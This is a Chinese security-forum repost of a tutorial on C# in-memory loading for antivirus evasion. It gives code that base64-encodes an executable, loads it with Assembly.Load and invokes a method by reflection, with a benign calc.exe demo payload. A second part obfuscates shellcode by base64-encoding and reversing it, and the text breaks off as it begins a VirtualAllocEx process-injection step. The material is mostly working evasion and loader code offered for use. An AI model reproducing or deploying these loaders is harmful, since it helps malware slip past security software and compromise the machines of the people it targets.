设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 干货|C#内存加载免杀实战
返回列表 发新帖
查看: 1109|回复: 0

干货|C#内存加载免杀实战

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-12-3 20:17:21 | 显示全部楼层 |阅读模式
原文链接:干货|C#内存加载免杀实战

DemoExe代码如下:
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Diagnostics;
  4. using System.Linq;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace DemoExe
  9. {
  10.     class Program
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             Console.WriteLine("DemoExe Run!!");
  15.         }
  16.     }
  17.     public class Test
  18.     {
  19.         public static void TestMethod()
  20.         {
  21.             Process p = new Process();
  22.             p.StartInfo.FileName = "C:\\windows\\system32\\calc.exe";
  23.             p.Start();
  24.         }
  25.     }
  26. }
复制代码

然后把DemoExe转换为base64字符串
  1. using System;
  2. using System.Collections.Generic;
  3. using System.IO;
  4. using System.Linq;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace Tobase64
  9. {
  10.     class Program
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             byte[] base64Buff = File.ReadAllBytes("DemoExe.exe");
  15.             string base64string = Convert.ToBase64String(base64Buff);
  16.             Console.WriteLine(base64string);
  17.         }
  18.     }
  19. }
复制代码

得到字符串值为:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAG5uCqYAAAAAAAAAAOAAIgALATAAAAoAAAAIAAAAAAAALigAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANsnAABPAAAAAEAAAJwFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAABEJwAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAANAgAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJwFAAAAQAAAAAYAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAPKAAAAAAAAEgAAAACAAUAjCAAALgGAAADAAIAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5yAQAAcCgPAAAKKh4CKBAAAAoqcnMRAAAKJW8SAAAKch0AAHBvEwAACm8UAAAKJioeAigQAAAKKgAAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAACwCAAAjfgAAmAIAAJwCAAAjU3RyaW5ncwAAAAA0BQAAWAAAACNVUwCMBQAAEAAAACNHVUlEAAAAnAUAABwBAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAATAAAAAwAAAAQAAAABAAAAFAAAAA4AAAABAAAAAgAAAAAAqgEBAAAAAAAGABcBTQIGAIQBTQIGAEsAGwIPAG0CAAAGAHMA5AEGAPoA5AEGANsA5AEGAGsB5AEGADcB5AEGAFAB5AEGAIoA5AEGAF8ALgIGAD0ALgIGAL4A5AEGAKUAtgEGAIkC2AEGAB4A2AEKAIECGwIKAAQCGwIAAAAAAQAAAAAAAQABAAAAEADQAaIBQQABAAEAAQAQAJYCogFBAAEAAwBQIAAAAACRAN8BMQABAFwgAAAAAIYYFQIGAAIAZCAAAAAAlgATADcAAgCBIAAAAACGGBUCBgACAAAAAQB8AgkAFQIBABEAFQIGABkAFQIKACkAFQIQADEAFQIQADkAFQIQAEEAFQIQAEkAFQIQAFEAFQIQAFkAFQIQAGEAFQIVAGkAFQIQAHEAFQIQAHkAFQIQAIkAMwAaAIEAFQIGAJEAFQIGAJEA9gEfAJkAJgAQAJEAkAIkAC4ACwA7AC4AEwBEAC4AGwBjAC4AIwBsAC4AKwB5AC4AMwB5AC4AOwB5AC4AQwBsAC4ASwB/AC4AUwB5AC4AWwB5AC4AYwCXAC4AawDBAC4AcwDOAASAAAABAAAAAAAAAAAAAAAAAKIBAAAEAAAAAAAAAAAAAAAoAAoAAAAAAAQAAAAAAAAAAAAAACgA2AEAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGVzdE1ldGhvZABDb25zb2xlAHNldF9GaWxlTmFtZQBXcml0ZUxpbmUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUARGVtb0V4ZQBEZW1vRXhlLmV4ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFByb2dyYW0AU3lzdGVtAE1haW4A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eT4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
然后还原DemoExe.exe,通过Assembly.Load()调用TestMethod方法。
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Reflection;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace LoadExe
  9. {
  10.     class Program
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             string base64string = @"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAG5uCqYAAAAAAAAAAOAAIgALATAAAAoAAAAIAAAAAAAALigAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANsnAABPAAAAAEAAAJwFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAABEJwAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAANAgAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJwFAAAAQAAAAAYAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAPKAAAAAAAAEgAAAACAAUAjCAAALgGAAADAAIAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5yAQAAcCgPAAAKKh4CKBAAAAoqcnMRAAAKJW8SAAAKch0AAHBvEwAACm8UAAAKJioeAigQAAAKKgAAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAACwCAAAjfgAAmAIAAJwCAAAjU3RyaW5ncwAAAAA0BQAAWAAAACNVUwCMBQAAEAAAACNHVUlEAAAAnAUAABwBAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAATAAAAAwAAAAQAAAABAAAAFAAAAA4AAAABAAAAAgAAAAAAqgEBAAAAAAAGABcBTQIGAIQBTQIGAEsAGwIPAG0CAAAGAHMA5AEGAPoA5AEGANsA5AEGAGsB5AEGADcB5AEGAFAB5AEGAIoA5AEGAF8ALgIGAD0ALgIGAL4A5AEGAKUAtgEGAIkC2AEGAB4A2AEKAIECGwIKAAQCGwIAAAAAAQAAAAAAAQABAAAAEADQAaIBQQABAAEAAQAQAJYCogFBAAEAAwBQIAAAAACRAN8BMQABAFwgAAAAAIYYFQIGAAIAZCAAAAAAlgATADcAAgCBIAAAAACGGBUCBgACAAAAAQB8AgkAFQIBABEAFQIGABkAFQIKACkAFQIQADEAFQIQADkAFQIQAEEAFQIQAEkAFQIQAFEAFQIQAFkAFQIQAGEAFQIVAGkAFQIQAHEAFQIQAHkAFQIQAIkAMwAaAIEAFQIGAJEAFQIGAJEA9gEfAJkAJgAQAJEAkAIkAC4ACwA7AC4AEwBEAC4AGwBjAC4AIwBsAC4AKwB5AC4AMwB5AC4AOwB5AC4AQwBsAC4ASwB/AC4AUwB5AC4AWwB5AC4AYwCXAC4AawDBAC4AcwDOAASAAAABAAAAAAAAAAAAAAAAAKIBAAAEAAAAAAAAAAAAAAAoAAoAAAAAAAQAAAAAAAAAAAAAACgA2AEAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGVzdE1ldGhvZABDb25zb2xlAHNldF9GaWxlTmFtZQBXcml0ZUxpbmUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUARGVtb0V4ZQBEZW1vRXhlLmV4ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFByb2dyYW0AU3lzdGVtAE1haW4A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eT4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
  15. ";
  16.             byte[] Buffer = Convert.FromBase64String(base64string);
  17.             Assembly assembly = Assembly.Load(Buffer);
  18.             Type type = assembly.GetType("DemoExe.Test");
  19.             MethodInfo method = type.GetMethod("TestMethod");
  20.             Object obj = assembly.CreateInstance(method.Name);
  21.             method.Invoke(obj, null);
  22.         }
  23.     }
  24. }
复制代码



这里我们随便写个shellcode loader。通过简单base64编码,加点干扰符号再反转一下字符串。

  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;

  7. namespace ShellcodeEnc
  8. {
  9.     class Program
  10.     {
  11.         static void Main(string[] args)
  12.         {
  13.             /* length: 799 bytes */
  14.           byte[] buf = new byte[799]{shellcode};
  15.         String s = Convert.ToBase64String(buf);
  16.             string ss = Reversal.ReversalString(s);
  17.             Console.WriteLine(ss);

  19.         }
  20.     }
  21. }
复制代码

  1. using System.Collections.Generic;
  2. using System.Linq;
  3. using System.Text;
  4. using System.Threading.Tasks;

  6. namespace ShellcodeEnc
  7. {
  8.     class Reversal
  9.     {
  10.         //字符串反转
  11.         public static string ReversalString(string input)
  12.         {
  13.             string result = "";
  14.             for (int i = input.Length - 1; i >= 0; i--)
  15.             {
  16.                 result += input[i];
  17.             }
  18.             return result;
  19.         }
  20.     }
  21. }
复制代码

然后写入base64shellcode.txt文件。通过目标进程注入。
VirtualAllocEx在目标进程开辟空间
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
